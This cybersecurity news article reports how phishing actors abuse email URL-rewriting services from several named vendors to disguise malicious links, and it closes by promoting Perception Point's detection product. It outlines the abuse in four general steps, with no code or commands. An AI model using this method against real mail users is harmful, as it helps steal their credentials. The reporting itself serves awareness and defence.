Cybercriminals have found a new way to exploit email security measures, turning them into tools for their malicious activities.

Since mid-June 2024, threat actors have been increasingly abusing URL rewriting features, which are designed to protect users from phishing threats, to carry out sophisticated attacks.

URL rewriting is a security feature employed by various email security vendors to protect users from malicious links in emails.

The process involves replacing original URLs with modified links that first direct recipients to the vendorโ€™s servers for threat scanning before allowing access to the web content.

There are two main approaches to URL rewriting:-

  1. Legacy solutions: These rely on rules and signatures based on previously identified threats.
  2. Newer solutions: These use computer vision and machine learning algorithms to scan links in real-time.

Besides this, researchers at Perception Point discovered that some organizations use a combination of both approaches, sometimes resulting in a โ€œdouble rewriteโ€ of URLs.

The Exploitation Technique

Attackers have been studying the inner workings of URL rewriting and are now exploiting it in their phishing campaigns. The most common method involves:-

  1. Compromising legitimate email accounts protected by URL rewriting features.
  2. Sending an email to themselves containing a โ€œcleanโ€ URL.
  3. Allowing theย email securityย service to rewrite the URL.
  4. Weaponizing the rewritten URL by modifying its destination to a phishing site.

This technique is particularly dangerous because it takes advantage of usersโ€™ trust in known security brands, making even security-aware employees more likely to click on seemingly safe links.

URL Rewriting Flowchart (Source โ€“ Perception Point)

Perception Pointโ€™s security researchers have intercepted several sophisticated attacks exploiting URL rewriting services:-

  1. Double Rewrite Attack: Involving Proofpoint and INKY, this attack used a rewritten phishing link disguised as a SharePoint notification. It included a CAPTCHA challenge to evade automated analysis.
  2. Multi-Target Exploitation: Attackers compromised an organization protected by INKY and Proofpoint, generated a rewritten URL, and repurposed it to target multiple other organizations.
  3. Mimecast Exploitation: A phishing attack leveraged Mimecastโ€™s URL rewriting service to disguise a malicious link leading to a credential-stealing site.
  4. IRS Phishing via Sophos: An attack used Sophosโ€™s URL rewriting service to mask a phishing link in an email impersonating the IRS and ID.me.
Threat Actors Abuse URL Rewriting (Source โ€“ Perception Point)

To combat these sophisticated attacks, advanced security solutions like Perception Pointโ€™s Dynamic URL Analysis are being employed. This approach offers:-

  • Proactive detection by scanning URLs in real-time before email delivery
  • Advanced anti-evasion capabilities to undo tactics likeย CAPTCHAย and geo-fencing
  • Post-delivery and meta-analysis to catch evolving threats
  • Browser-level security extensions for additional protection

As phishing tactics continue to evolve, itโ€™s crucial for organizations and individuals to stay informed about these new techniques and implement robust, multi-layered security solutions to protect against increasingly sophisticated cyber threats.

This articleย first appeared in Cyber Security News, written by Tushar Subhra Dutta on November 25, 2024.